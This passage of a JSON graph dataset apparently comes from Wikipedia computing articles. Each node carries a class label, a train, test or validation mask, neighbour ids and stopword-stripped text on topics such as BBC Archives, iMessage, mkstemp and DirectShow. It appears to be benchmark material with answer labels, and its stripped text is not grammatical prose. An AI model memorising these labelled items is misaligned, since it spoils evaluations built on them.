      7515,
      3941,
      877,
      3956,
      9082,
      7044,
      11152,
      10132,
      10141,
      1440,
      5024,
      5028,
      11175,
      939,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      6588,
      9664,
      8133,
      2508,
      4054,
      5078,
      7639,
      8664,
      1504,
      10208,
      9186,
      8172,
      2542,
      2041,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 4315,
    "label": 1,
    "text": "BBC_Archives:bbc archives bbc archives collections documenting bbc ’ broadcasting history including copies television radio broadcasts internal documents photographs online content sheet music commercially available music press cuttings artefacts historic equipment original copies collections permanently retained process digitised collections uploaded onto bbc archives website bbc online viewers see archive one largest broadcast archives world 15 million items bbc archives encompass numerous different archives containing different materials produced acquired bbc earliest material dates back 1890 consists 1 million hours playable material addition documents photographs equipment archives contain 15 million items 60 miles shelving spread several sites stock managed using bar code system help locate material shelves also track material lent bbc says budget managing protecting digitising archive accounts small part bbc overall spend bbc engaging ongoing project digitise archived programme material converting recordings made older analogue formats audio tape videotape film electronic formats compatible modern computer systems much audio-visual material originally recorded formats obsolete incompatible modern broadcast equipment due fact machines used reproduce many formats longer manufactured additionally film audio formats slowly disintegrating digitisation also serves digital preservation programme bbc archive website relaunched online 2008 provided newly released historical material regularly since bbc works partnership british film institute bfi national archives partners working using materials 2012 bbc archive development produced book primarily aimed bbc staff titled 'bbc archive collections archive use book describes bbc archive collections offers guidance around items collections reused online 1963 2010 majority television material nationally networked programmes bbc archive housed archive centre windmill road brentford west london television programmes also stored open university milton keynes bbc nations regional libraries around country late 1990s early 2000s material radio side bbc also stored site condition three windmill road buildings deteriorated years suffered occasional flooding incidents eventually archive relocated new centre perivale park perivale three miles north old site new bbc archive centre opened summer 2010 material successfully moved march 2011 material stored thirteen vaults controlled match best climate material inside named different bbc personality depending content contained addition vaults new editing workrooms added material easily transferred formats well viewed restored building also fitted fire suppression systems protect archive event incident centre total loss archive avoided april 2019 bbc archives employs around 200 staff based archive centre perivale bbc television archive contains 1.5 million tape items well 600,000 cans film material archive holds extensive material approximately mid-1970s onwards important recordings broadcaster retained future recordings date less comprehensively preserved process telerecording originally invented 1947 videotape recording gradually introduced late 1950s onwards due expense tapes recording seen production use recordings subsequently wiped telerecordings junked exceptions early years usually occasions great importance coronation queen elizabeth ii addition numerous programmes time broadcast 'live utilised recording procedure production process earliest item collection 1936 today majority programmes kept including news entertainment drama selection long-running programmes quiz shows remaining material television archive offered british film institute prior disposed bbc sound archive contains archived output bbc radio output widespread recordings exist archive mid-1930s recording programmes speeches kept rebroadcast catalyst launch bbc empire service 1932 subsequent rebroadcast speeches political leaders time convenient different time zones prior broadcast recordings seen false listener avoided recordings made frequently disposed efforts marie slocombe founded sound archive 1937 retained recordings prominent figures country archive became officially appointed sounds recording librarian 1941 today bbc radio output recorded re-use approximately 66 output preserved archives programmes involving guests live performances artists kept whereas programmes dj plays commercially available music sampled kept entirely prior material disposed material offered british library sound archive archive consists number different formats including wax cylinders numerous gramophone records made shellac vinyl well numerous recordings tape cd digital audio tape dat difficulty different formats availability machines required play vinyl records archive 16 inches size require large phonograph units play players wax cylinders dats longer production also 700,00 vinyl records 180,000 78 records 400,000 lp record 350,000 cd archive radio digital archive capturing radio programmes broadcast quality wav files since 2008 1.5 million recordings growing daily wax cylinder collection donated british library sound archive based new bbc archive centre perivale along television archive previously based windmill road brentford bbc written archive contains internal written documents communications corporation launch 1922 present day collections shed light behind scenes workings corporation also elaborate difficulties getting television radio programme air case may archive guidelines state access files post-1980 restricted due current nature files general exception rule documents scripts programme broadcast records written archives located bbc written archive centre caversham berkshire near reading centre houses archive four half miles shelving along reading rooms centre different bbc archives centre opens writers academic researchers higher education bbc photographic library responsible approximately 7 million images dating back 1922 created publicity purposes subsequently kept future use addition programme promotion large number images historic events often incorporate daily news bulletins result half photographic library team work specifically images images kept originals archive digitisation utilised specific image required use image sent digital format copies images also used case images damaged notable due vinegar syndrome popular images archive include colin firth pride prejudice michael parkinson interviewing muhammad ali martin bashir interviewing diana princess wales picture delia derbyshire work radiophonic workshop bbc turn millennium bbc launched bbc archive treasure hunt public appeal recover pre-1980s lost bbc radio television productions original material featuring several popular programmes lost due practice wiping copyright issues technological reasons resolution appeal one hundred productions recovered including men ministry something shout man superman doctor dilemma 'm sorry 'll read hancock half hour 'm sorry n't clue ronnie corbett thing addition recording sessions elton john ringo starr paul simon also peter sellers estate collection donated numerous recordings featuring peter sellers bbc together british film institute open university channel 4 teachers tv formed collaboration named creative archive licence group create copyright licence re-release archived material licence trial launched 2005 notable re-release part bbc news archive programmes made bbc natural history unit creative use public artists teachers encouraged use content create works terms licence restrictive compared copyleft licences use creative archive content commercial endorsement campaigning defamatory derogatory purposes forbidden derivative works released licence content used within uk trial ended 2006 following review bbc trust works released licence withdrawn voices archives former bbc project launched partnership bbc four provided free access audio interviews various notable people professions variety political religious social backgrounds website ceased updated june 2005 concept instead adopted bbc radio 4 collection film interviews various programmes bbc heritage collection newest bbc archives holds variety historic broadcast technology art props merchandise collection created personal collections bequeaths former staff members bbc formal policy heritage collection c.2003 collection includes amongst items bbc one noddy globe clock bbc-marconi type microphone early crystal radio made british broadcasting company marconi/emi camera used early bbc television experiments bbc micro computer selection items used create foley addition broadcast technology art also kept namely portraits bbc director generals well props including original tardis doctor children television puppet gordon gopher heritage collection one permanent home majority objects display either around bbc properties loan museums collections notable museum housing collection national science media museum bradford years bbc used various programme catalogue databases keep record programmes archives internal databases include infax fabric publicly accessible databases include bbc genome bbc programmes",
    "neighbors": [
      525
    ],
    "mask": "None"
  },
  {
    "node_id": 4316,
    "label": 3,
    "text": "Windows_Server_2019:windows server 2019 windows server 2019 latest version server operating system microsoft part windows nt family operating systems windows server 2019 announced march 20 2018 first windows insider preview version released day released general availability october 2 2018 october 6 2018 distribution windows version 1809 build 17763 paused microsoft investigated issue user data deleted in-place upgrade affected systems user profile folder e.g documents music pictures moved another location data left original location windows server 2019 based windows version 1809 codebase removed distribution time re-released november 13 2018 software product life cycle server 2019 reset accordance new release date windows server 2019 version 1903 following new features",
    "neighbors": [
      8576,
      641,
      10624,
      2179,
      3463,
      651,
      6797,
      4240,
      2193,
      3857,
      6675,
      2196,
      7057,
      8080,
      8976,
      10896,
      4505,
      11283,
      4515,
      11301,
      3496,
      6441,
      6697,
      1581,
      7983,
      11184,
      3250,
      3890,
      9910,
      823,
      9655,
      1978,
      6462,
      7615,
      321,
      7106,
      582,
      1098,
      10957,
      847,
      3535,
      9173,
      11605,
      2391,
      4439,
      2777,
      3289,
      8798,
      9438,
      2656,
      5600,
      10338,
      11103,
      2919,
      8296,
      5225,
      4074,
      8299,
      5356,
      9448,
      10989,
      5103,
      9839,
      5363,
      7796,
      3573,
      6265,
      8315,
      636,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 4317,
    "label": 3,
    "text": "Metal_Gear_2:_Solid_Snake:metal gear 2 solid snake metal gear 2 solid snake overhead action-adventure stealth video game tagline tactical espionage game initially released konami 1990 msx2 computer platform sequel msx2 version original metal gear solid snake designed written series creator hideo kojima learned existence snake revenge sequel nes developed specifically north american european markets solid snake would officially available japan north american european release playstation 2 2006 included full ports msx2 metal gear games additional content also included metal gear solid 3 released playstation 3 xbox 360 playstation vita given stand-alone re-release japan downloadable game mobile phones wii virtual console set 1999 years events original game solid snake must infiltrate heavily defended territory known zanzibar land rescue kidnapped scientist destroy revised metal gear game significantly evolved stealth-based game system predecessor almost every way introduced complex storyline dealing themes nature warfare nuclear proliferation considered one best 8 bit games ever made metal gear 2 builds upon stealth-based gameplay system predecessor original metal gear player objective infiltrate enemy stronghold avoiding detection soldiers cameras infrared sensors surveillance devices biggest change game done enemy abilities instead remaining stationed one screen like first game enemy soldiers patrol different screens across single map moreover guards expanded field vision 45 degrees along ability turn heads left right see diagonally enemy also detect sounds enemy able hear noise made player punch wall gunshots made without suppressor investigate source sound made also detect sounds made player walking certain surfaces means players need careful surfaces walk player discovered enemy counter displayed upper right side screen go enemy lost track player counter reaches zero alert phase go game return normal player given variety new maneuvers tools help remain undetected complete game example player kneel crawl addition walking allowing player avoid making noise certain terrains pick land mines hide tight spaces desks inside air ducts radar 3x3 grid upper right screen shows player current area center grid red dot enemy soldiers white dots allowing player determine ahead however radar disabled game enters alert phase radar also used mine detector equipped determine locations enemy mines launch stinger missiles onto airborne target many weapons equipment first game brought along new items robotic mice used distract enemies camouflaged mat three different types rations special attributes health carrying capacity increased time boss defeated transceiver also greatly revamped first game well conversations context-sensitive rather simply area-oriented transceiver screen displays faces snake radio contact currently communicating player also talk children living fortress gain new information player penalized loss health kills child areas varied previous msx2 game number puzzles must fulfilled complete game luring carrier pigeon specific kind ration chasing female spy ladies lavatory deciphering secret tap codes gain new frequency numbers msx2 version required use either floppy disk game master ii sram memory save player progress passwords used well absence either complexities eliminated later ports due standardization storage devices memory cards internal hard drives save data solid snake formerly retired foxhound agent hero original metal gear returns playable character new mission rescue kidnapped czechoslovak biologist dr. kio marv forces zanzibarland assisted radio support crew consisting roy kyanbel roy campbell later versions new commanding officer mcdonnell miller survival coach drill instructor george kesler george kasler later versions military strategist yozev norden renamed johan jacobsen later revised versions wildlife expert also assisting on-site horry white holly white later versions cia agent posing journalist natasha marcova gustava heffner later versions stb agent dr. marv bodyguard dr. petrovich madnar drago pettrovich madnar newer versions metal gear designer first game captured along dr. marv also appearing game big boss renegade former commander foxhound grey fox gray fox later versions disappeared following events outer heaven incident bosses installment consist black color black ninja later versions experimental drug-enhanced ninja disbanded nasa project revealed kyle schneider original metal gear running man former olympic runner turned terrorist red blaster explosive expert spetsnaz ultra box four horsemen later version assassination squad specializing confined spaces predator jungle evil later versions jungle warfare expert south african reconnaissance command night sight night fright later versions assassin vietnam uses state art stealth suit renders invisible radar human eye major oil crisis seriously affects global economy late 1990s petrol deposits running faster previous estimates efforts adopt alternative energy sources attempts drill oil fails take slack counter problem czech scientist dr. kio marv bio-engineers new species algae oilix could produce petroleum-grade hydrocarbons little expense effort unveils algae world energy conference prague way demonstration united states kidnapped soldiers zanzibarland central asian country established 1997 successful independence war soviet union nato discovers zanzibarland leaders plan hold world hostage controlling supply oil oilix nuclear warheads pillaged old stockpiles marked dismantling light global efforts toward nuclear disarmament foxhound new commander roy campbell brings solid snake retirement sends zanzibarland rescue dr. marv christmas eve 1999 course mission snake teams holly white cia operative posing journalist gustava heffner stb agent dr. marv bodyguard also reunited dr. drago pettrovich madnar metal gear inventor outer heaven claims kidnapped forced work another metal gear project named metal gear zanzibarland well oversee mass-production smaller non-nuclear-equipped metal gear units snake learns dr. madnar big boss snake former superior survived events first game leads zanzibarland snake heffner dr. madnar head toward zanzibarland main prison heffner killed missile fired metal gear dr. madnar recaptured enemy new metal gear pilot revealed gray fox determined finish mission snake fights zanzibarland elite mercenary force manages reach dr. marv cell snake arrives late finds dr. marv corpse oilix data holly later tips actually died dr. madnar torture addition snake learns madnar volunteered services zanzibarland finish work metal gear revenge scientific community shunning events first game snake incapacitates madnar latter attempts attack snake faces gray fox metal gear eventually destroys mech men later fight hand-to-hand minefield snake finishes tries escape snake meets big boss lost equipment weapons disposal snake forced improvise using items find lighter aerosol fashioning makeshift flamethrower snake defeats big boss second time snake holly escape together deliver oilix formula campbell following success nes version metal gear sold million units north america konami began development sequel platform titled snake revenge designed specifically overseas market hideo kojima directed first msx2 game involved either nes versions plans develop sequel time became reacquainted coworker assigned work snake revenge train ride tokyo coworker revealed involvement project encouraged kojima create sequel end train ride kojima already envisioned basic premise game undergoing business trip sales division konami kojima successfully convinced superiors approve development metal gear 2 solid snake msx division msx2 version metal gear 2 released japan july 20 1990 unlike first msx2 game official english localization produced konami already discontinued sales msx games europe although fan translation later produced 1997 msx hobbyist group g international first port metal gear 2 another platform japanese feature phone version released october 1 2004 downloadable app i-mode ezweb yahoo mobile services version features additions original msx2 version easy mode unlockable boss rush mode clearing main game also include adjustments changes notably replacement portraits used conversation sequences portraits msx2 version modeled real life celebrities new portraits instead designed closely resemble metal gear solid illustrator yoji shinkawa character designs later installments changes would also implemented version included playstation 2 expanded edition released japan 2005 included full ports msx2 metal gear games part newly-added content subsistence would later released north america europe 2006 full english localizations msx2 games marking first time metal gear 2 given international release two msx2 games would later included metal gear solid 3 released playstation 3 xbox 360 2011 playstation vita 2012 metal gear 2 also released wii virtual console exclusively japan march 30 2010 like virtual console games metal gear 2 emulated original msx2 hardware rather ported mobile phone version like subsistence hd edition ports although version game patched use revised character portraits rather original ones game music written konami kukeiha club members tsuyoshi sekito masahiro ikariko mutsuhiko izumi yuko kurahashi tomoya tomita kazuhiko uehara yuji takenouchi cartridge msx2 version carried custom sound chip scc previously employed games nemesis 2 snatcher enhanced music sound effects beyond msx basic capabilities arranged music based metal gear 2 solid snake used vr training disc metal gear solid integral released north america metal gear solid vr missions additionally integral features two hidden tunes based metal gear 2 available via secret codec frequency main game one arranged version theme solid snake arrangement zanzibar breeze listenable contacting codec frequency 140.66 certain locations theme solid snake also made appearance nintendo 2008 crossover fighting game super smash bros. brawl initial release metal gear 2 ranked msx magazine top 30 best selling msx games list six months premiering 1 spot october 1990 issue metal gear 2 solid snake would later receive near universal-acclaim retro game reviewers according paul soth gamespy game surpassed predecessor metal gear every way addition praising gameplay also praised game gripping well written storyline rich characterization quality storytelling made mgs compelling concluded players disappointed great gameplay story remains one best 8 bit games ever made game informer critical game however giving 7 10 wrote order reach pivotal moments game story must endure ridiculous situations solid snake ever seen game focus constant backtracking keycard acquisition makes repetitive concluded diehard fans find experience rewarding best way play game bonus disc metal gear solid 3 subsistence game mechanics sequel metal gear solid despite transition 3d remained largely similar 2d predecessor included plot summaries first two msx2 games accessible special mode previous operations retro gamer regarded metal gear 2 close anyone get playing metal gear solid 2d putting game boy color game released decade later 2000 retro gamer also included among top ten msx games jeremy parish 1up.com referred metal gear solid basically high-spec remake metal gear 2 nickolai adkins 1up also noted much scenario plot elements metal gear 2 recycled metal gear solid ranging snake emerging retirement rescue kidnapped non-soldier personnel beginning escape sequence snake accompanied female accomplice/love interest end ign notes metal gear 2 introduced stealth mechanics making noise attract guards crouching crawling ground disarming mines enemies view cones",
    "neighbors": [
      5762,
      8232,
      8937,
      10316,
      9005,
      9006,
      2096,
      8819,
      10931
    ],
    "mask": "Test"
  },
  {
    "node_id": 4318,
    "label": 5,
    "text": "IMessage:imessage imessage instant messaging service developed apple inc launched 2011 supported messages application ios 5 later os x mountain lion later imessage announced scott forstall wwdc 2011 keynote june 6 2011 version messages app ios support imessage included ios 5 update october 12 2011 february 16 2012 apple announced new messages app replacing ichat would part os x mountain lion mountain lion released july 25 2012 october 23 2012 apple ceo tim cook announced apple device users sent 300 billion messages using imessage apple delivers average 28,000 messages per second february 2016 eddy cue announced number imessages sent per second grown 200,000 may 2014 lawsuit filed apple issue user switches apple device non-apple device messages delivered imessage would reach destination november 2014 apple addressed problem providing instructions online tool deregister imessage federal court dismissed suit apple favor march 21 2016 group researchers johns hopkins university published report demonstrated attacker possession imessage ciphertexts could potentially decrypt photos videos sent via service researchers published findings vulnerability patched apple may 3 2016 independent open-source project named piemessage announced app developer eric chee consisting code os x communicates imessage connects android client allowing android client send receive messages june 13 2016 apple announced addition apps imessage service accessible via messages apps apps create share content add stickers make payments within imessage conversations without switch standalone apps one could develop standalone imessage apps extension existing ios apps publishers also create standalone stickers apps without writing code according sensor tower march 2017 imessage app store features nearly 5,000 message-enabled apps imessage allows users send texts documents photos videos contact information group messages internet ios macos users imessage alternative sms mms messaging users devices running ios 5 later send sms setting messages cause message sent via sms sender active internet connection receiver internet connection message stored server connection restored imessage accessible messages app iphone ipad ipod touch running ios 5 later mac running os x mountain lion later owners devices register one email addresses apple additionally iphone owners register phone numbers apple provided carrier supported message sent mobile number messages check apple mobile number set imessage message seamlessly transition imessage sms messages user sent communication aligned right replies people left user see imessage user typing message pale gray ellipsis appears text bubble user reply started also possible start conversation one ios device continue another iphones green buttons text bubbles indicate sms-based communication ios devices blue buttons text bubbles indicate imessage communication imessages encrypted tracked using delivery receipts recipient enables read receipts sender able see recipient read message imessage also allows users set chats two people—a group chat launch ios 10 users send messages accompanied range bubble screen effects holding send button force range effects surfaced users select effect sent receiver imessage protocol based apple push notification service apns —a proprietary binary protocol sets keep-alive connection apple servers every connection unique code acts identifier route used send message specific device connection encrypted tls using client-side certificate requested device activation imessage november 12 2012 chetan sharma technology strategy consulting firm published us mobile data market update q3 2012 noting decline text messaging united states suggested decline may attributed americans using alternative free messaging services imessage 2017 google announced would compete imessage messaging service android messaging november 4 2014 electronic frontier foundation eff listed imessage secure messaging scorecard giving score 5 7 points received points communications encrypted transit communications encrypted keys provider n't access end-to-end encryption past communications secure keys stolen forward secrecy security designs well-documented recent independent security audit missed points users verify contacts identities source code open independent review september 2015 matthew green noted imessage display key fingerprints out-of-band verification users unable verify man-in-the-middle attack occurred post also noted imessage uses rsa key exchange means opposed eff scorecard claims imessage feature forward secrecy august 7 2019 researchers project zero presented 6 “ interaction-less ” exploits imessage could used takeover control user ’ device 6 exploits fixed ios 12.4 released july 22 2019 however stil undisclosed exploits patched future update",
    "neighbors": [
      10242,
      10755,
      9732,
      4615,
      1036,
      1549,
      5647,
      7697,
      1042,
      11289,
      3610,
      10271,
      3105,
      6186,
      4139,
      6700,
      1074,
      8754,
      8758,
      9784,
      8253,
      576,
      6208,
      8783,
      5713,
      4180,
      3670,
      1623,
      3672,
      4184,
      10838,
      2141,
      4702,
      3681,
      9826,
      2149,
      5733,
      8806,
      3691,
      8303,
      2673,
      6771,
      2676,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      5251,
      3719,
      10888,
      4746,
      8842,
      11402,
      11408,
      8852,
      7318,
      5784,
      1177,
      4251,
      3228,
      2207,
      11430,
      171,
      5292,
      8877,
      1710,
      2734,
      2735,
      3248,
      7857,
      3766,
      2232,
      9912,
      4283,
      3772,
      7869,
      9406,
      6849,
      1218,
      6855,
      2760,
      713,
      1738,
      9418,
      3790,
      7378,
      3284,
      3286,
      9430,
      3293,
      4318,
      3812,
      6884,
      231,
      2282,
      9451,
      1772,
      2288,
      7928,
      8441,
      7420,
      7422,
      4863,
      11521,
      2819,
      1796,
      5382,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      11037,
      9511,
      10023,
      811,
      3371,
      4399,
      7983,
      9519,
      10036,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      4933,
      838,
      6982,
      7496,
      6474,
      9035,
      2892,
      2388,
      4957,
      6495,
      9572,
      9063,
      4457,
      10602,
      3948,
      11629,
      10608,
      3959,
      3460,
      2439,
      6023,
      6539,
      7052,
      9100,
      1428,
      9109,
      3483,
      1439,
      2979,
      9123,
      11173,
      7590,
      1962,
      8109,
      1467,
      2492,
      8637,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      11221,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      6628,
      487,
      2023,
      10221,
      2542,
      7154,
      5619,
      11257,
      7163,
      10748,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 4319,
    "label": 4,
    "text": "Runa_Sandvik:runa sandvik runa sandvik computer security expert known proponent strong encryption hired new york times senior director information security march 2016 proponent smartphone messaging application signal acquired first computer fifteen years old studied computer science norwegian university science technology 2014 sandvik married michael auger pair made home washington d.c. sandvik early developer tor anonymity network cooperative facility helps individuals obfuscate internet protocol using access internet sandvik technical advisor freedom press foundation serves review board black hat europe sandvik interviewed edward snowden may 2014 february 2015 sandvik documented efforts retrieve information foia reqests.. sandvik husband auger demonstrated smart rifles remote access remotely hacked 13,000 trackingpoint sniper rifle equipped embedded linux computer according wired magazine used according specifications aiming computer enable novice hit remote targets would otherwise require skilled marksman however manufacturers designed aiming computer wifi capabilities shooter could upload video shots sandvik auger found could initiate unix shell command line interpreter use alter parameters aiming computer relies always miss targets found knowledgeable hacker could use shell acquire root access acquiring root access allowed interloper erase aiming computer software— bricking aiming computer sandvik led efforts make new york times tor onion service allowing times employees readers access newspaper site ways impede intrusive government monitoring",
    "neighbors": [
      11442,
      3495
    ],
    "mask": "Train"
  },
  {
    "node_id": 4320,
    "label": 6,
    "text": "Mkstemp:mkstemp computing codice_1 posix function creating temporary file computer file usually ceases exist program opened file closes terminates accepts argument determines location temporary file prefix generated filename codice_1 added single unix specification function codice_3 deprecated latter carried risk temporary file name could created another thread process within time caller obtains temporary filename attempts create codice_1 suffer problem codice_5 following code example usage codice_1 local variable codice_13 modified codice_1 contain path new file unspecified codice_1 sets errno values errno set event failure codice_1 function generates filename according supplied argument template attempts create repeats process file successfully created opens file returns file descriptor caller data buffer passed function template containing new filename file deleted immediately codice_1 call returns prevent processes opening file still used calling process still valid file descriptor older versions codice_1 created file umask 0666 resulting temporary files readable writable users thus presenting security vulnerability mitigated setting umask manually calling codice_1 newer versions function create file umask 600 owner file may read write",
    "neighbors": [
      2432,
      11067,
      8516,
      8975,
      592,
      1746,
      3571,
      52,
      1336,
      1114,
      10555,
      6813
    ],
    "mask": "None"
  },
  {
    "node_id": 4321,
    "label": 2,
    "text": "DirectShow:directshow directshow sometimes abbreviated ds dshow codename quartz multimedia framework api produced microsoft software developers perform various operations media files streams replacement microsoft earlier video windows technology based microsoft windows component object model com framework directshow provides common interface media across various programming languages extensible filter-based framework render record media files demand request user developer directshow development tools documentation originally distributed part directx sdk currently distributed part windows sdk formerly known platform sdk microsoft plans completely replace directshow gradually media foundation future windows versions one reason cited microsoft provide much robust support content protection systems see digital rights management microsoft msft becky weiss also confirms 'll notice working media foundation requires work slightly lower level working directshow would still directshow features n't yet media foundation described media foundation article windows vista windows 7 applications use media foundation instead directshow several media related tasks direct predecessor directshow activemovie codenamed quartz originally chartered provide mpeg-1 file playback support windows also intended future replacement media processing frameworks like video windows never designed handle codecs put video frames different order compression process media control interface never fully ported 32-bit environment utilize com quartz team started existing project called clockwork clockwork modular media processing framework semi-independent components worked together process digital media streams previously used several projects including microsoft interactive television mitv project another project named tiger activemovie announced march 1996 released may 1996 bundled beta version internet explorer 3.0 march 1997 microsoft announced activemovie would become part directx 5 suite technologies around july started referring directshow reflecting microsoft efforts time consolidate technologies worked directly hardware common naming scheme directshow became standard component windows operating systems starting windows 98 however available windows 95 installing latest available directx redistributable directx version 8.0 directshow became part mainline distribution directx sdk placed alongside directx apis october 2004 directshow removed main directx distribution relocated directx extras download april 2005 directshow removed entirely directx moved windows sdk starting windows server 2003 sp1 version sdk directx sdk however still required build directshow samples since november 2007 directshow apis part windows sdk includes several new enhancements codecs filter updates enhanced video renderer evr dxva 2.0 directx video acceleration directshow divides complex multimedia task e.g video playback sequence fundamental processing steps known filters filterwhich represents one stage processing datahas input and/or output pins may used connect filter filters generic nature connection mechanism enables filters connected various ways implement different complex functions implement specific complex task developer must first build filter graph creating instances required filters connecting filters together three main types filters rendering process filter graph searches windows registry registered filters builds graph filters based locations provided connects filters together developer request executes i.e. plays pauses etc created graph directshow filter graphs widely used video playback filters implement functions file parsing video audio demultiplexing decompressing rendering well video audio recording editing encoding transcoding network transmission media interactive tasks dvd navigation may also controlled directshow example left right graph contains source filter read mp3 file stream splitter decoder filters parse decode audio rendering filter play raw audio samples filter one pins used connect filter filters every pin functions either output input source data flow one filter another depending filter data either pulled input pin pushed output pin order transfer data filters pin connect one pin agree kind data sending filters built using set c++ classes provided directshow sdk called directshow base classes handle much creation registration connection logic filter filter graph use filters automatically need registered separate directshow registry entry well registered com registration managed directshow base classes however application adds filters manually need registered unfortunately difficult modify graph already running usually easier stop graph create new graph scratch starting directshow 8.0 dynamic graph building dynamic reconnection filter chains introduced help alter graph running however many filter vendors ignore feature making graph modification problematic graph begun processing default directshow includes number filters decoding common media file formats mpeg-1 mp3 windows media audio windows media video midi media containers avi asf wav splitters/demultiplexers multiplexers source sink filters static image filters since associated patented technologies licensed windows license fees required e.g. fraunhofer mp3 codecs mpeg-4 advanced simple profile aac h.264 vorbis containers mov mp4 available 3rd parties incorporating support additional codecs involve paying licensing fees involved codec technology developer patent holder however directshow standard format repertoire easily expanded means variety filters filters enable directshow support virtually container format audio video codec example filters developed ogg vorbis musepack ac3 finally bridge filters simultaneously support multiple formats well functions like stream multiplexing exposing functionality underlying multimedia apis vlc amount work required implement filter graph depends several factors simplest case directshow create filter graph automatically source file url possible developer may able manually create filter graph source file possibly addition custom filter let directshow complete filter graph connecting filters together next level developer must build filter graph scratch manually adding connecting desired filter finally cases essential filter unavailable developer must create custom filter filter graph built unlike main c api quicktime necessary call moviestask loop load media file directshow handles transparent way creates several background threads smoothly play requested file url without much work required programmer also contrast quicktime nothing special required loading url instead local file diskdirectshow filter graph abstracts details programmer although recent developments quicktime including activex control reduced disparity directshow editing services des introduced directx 8.0/windows xp api targeted video editing tasks built top core directshow architecture directshow editing services introduced microsoft windows movie maker includes apis timeline switching services resizing cropping video audio effects well transitions keying automatic frame rate sample rate conversion features used non-linear video editing allowing creation composite media number source audio video streams directshow editing services allow higher-level run-time compositing seeking support graph management still allowing applications access lower-level directshow functions original api c++ directshow editing services accessible microsoft .net compatible language including microsoft visual c microsoft visual basic using third-party code library called directshownet library alternatively entire directshow api including directshow editing services accessed borland delphi 5 6 7 c++ builder 6 later versions minor modifications using third party software library called dspack march 2012 apparently early 2009 microsoft stated directshow editing services api supported may altered unavailable future originally windows 9x directshow used video renderer filter drew images using directdraw 3 could also fall back gdi overlay drawing modes circumstances depending upon visibility video window video card capabilities limited access video window video windows plagued deadlocks caused applications incorrect handling video windows early directshow releases handle playback window hidden applications also reliable way draw caption text graphics top video directshow 6.0 released part directx media introduced overlay mixer renderer designed dvd playback broadcast video streams closed captioning subtitles overlay mixer uses directdraw 5 rendering downstream connection video renderer required window management overlay mixer also supports video port extensions vpe enabling work analog tv tuners overlay capability sending video directly video card via analog link rather via pci bus overlay mixer also supports dxva connections always renders overlay full-screen video tv-out always activated windows xp introduced new filter called video mixing renderer 7 vmr-7 sometimes referred vmr number 7 vmr-7 used directdraw version 7 render video option use gdi drawing main new feature vmr-7 ability mix multiple streams graphics alpha blending allowing applications draw text graphics video support custom effects also featured windowless mode access composited image rendered fixed problems access window handle vmr-7 officially released windows xp directx 9 included vmr-9 version uses direct3d 9 instead directdraw allowing developers transform video images using direct3d pixel shaders available windows platforms part directx 9 redistributable vmr-7 provides windowless mode however unlike overlay mixer vmr-7 support video ports using /3gb boot option may cause vmr-9 fail windows vista windows 7 ship new renderer available media foundation component directshow filter called enhanced video renderer evr evr designed work desktop window manager supports dxva 2.0 available windows vista windows 7 offers better performance better quality according microsoft january 8 2007 microsoft received emmy award streaming media architectures components 58th annual technology engineering emmy awards commanding directshow play file relatively simple task however programming advanced customizations commanding directshow display certain windows messages video window creating custom filters many developers complain difficulties regarded one microsoft complex development libraries/apis developers rarely create directshow filters scratch rather employ directshow base classes base classes often simplify development allowing programmer bypass certain tasks however process may remain relatively complex code found base classes nearly half size entire mfc library result even base classes number com objects directshow contains often overwhelms developers cases directshow api deviates traditional com rules particularly regard parameters used methods overcome difficulties directshow unique com rules developers often turn higher level api uses directshow notably windows media player sdk api provides developer activex control fewer com interfaces deal although directshow capable dynamically building graph render given media type certain instances difficult developers rely functionality need resort manually building filter graphs resulting filter graph variable possible filter graphs change time new filters installed computer directshow also criticized support digital rights management drm however directshow minimal support drm api windows media player sdk significantly reflects microsoft adherence drm codec hell term derived dll hell multiple directshow filters conflict performing task large number companies develop codecs form directshow filters resulting presence several filters decode media type issue exacerbated directshow merit system filter implementations end competing one another registering increasingly elevated priority microsoft ted youmans explained directshow based merit system idea using combination filter ’ merit specific media type/sub type one could reasonably pick right codec every time n't really designed competing merit nuclear arms race tool help troubleshooting codec hell issues usually referenced gspot codec information appliance useful determining codec used render video files avi containers graphedit also help understanding sequence filters directshow using render media file codec hell resolved manually building filter graphs using media player supports ignoring overriding filter merits using filter manager changes filter merits windows registry directshow developer-centric framework api directly offer end-user control encoding content incorporate user interface encoding using installed codecs different formats instead relies developers develop software using api contrast multimedia frameworks quicktime video windows allow end-users perform basic video-related tasks re-encoding using different codec editing files streams convenience offered end-user gui apparent since avi format codecs used video windows still remain use example virtualdub",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      10282,
      4143,
      9263,
      11316,
      1077,
      8246,
      8262,
      1098,
      4174,
      4178,
      9813,
      603,
      2145,
      5225,
      1656,
      10360,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      651,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      2221,
      10414,
      8391,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      6370,
      4836,
      1770,
      11498,
      3821,
      5357,
      10991,
      2804,
      6927,
      9491,
      5396,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      9579,
      2943,
      9609,
      9612,
      8080,
      9114,
      10654,
      8607,
      11683,
      3496,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 4322,
    "label": 0,
    "text": "Natural_Language_Engineering:natural language engineering natural language engineering bimonthly peer-reviewed academic journal published cambridge university press covers research software natural language processing aim bridge gap traditional computational linguistics research implementation practical applications potential real-world use original publication theoretical applied aspects computational linguistics journal also contains industry watch emerging trends columns tracking developments field editor-in-chief ruslan mitkov university wolverhampton according journal citation reports journal 2016 impact factor 1.065",
    "neighbors": [
      11056,
      1890,
      7780
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4323,
    "label": 4,
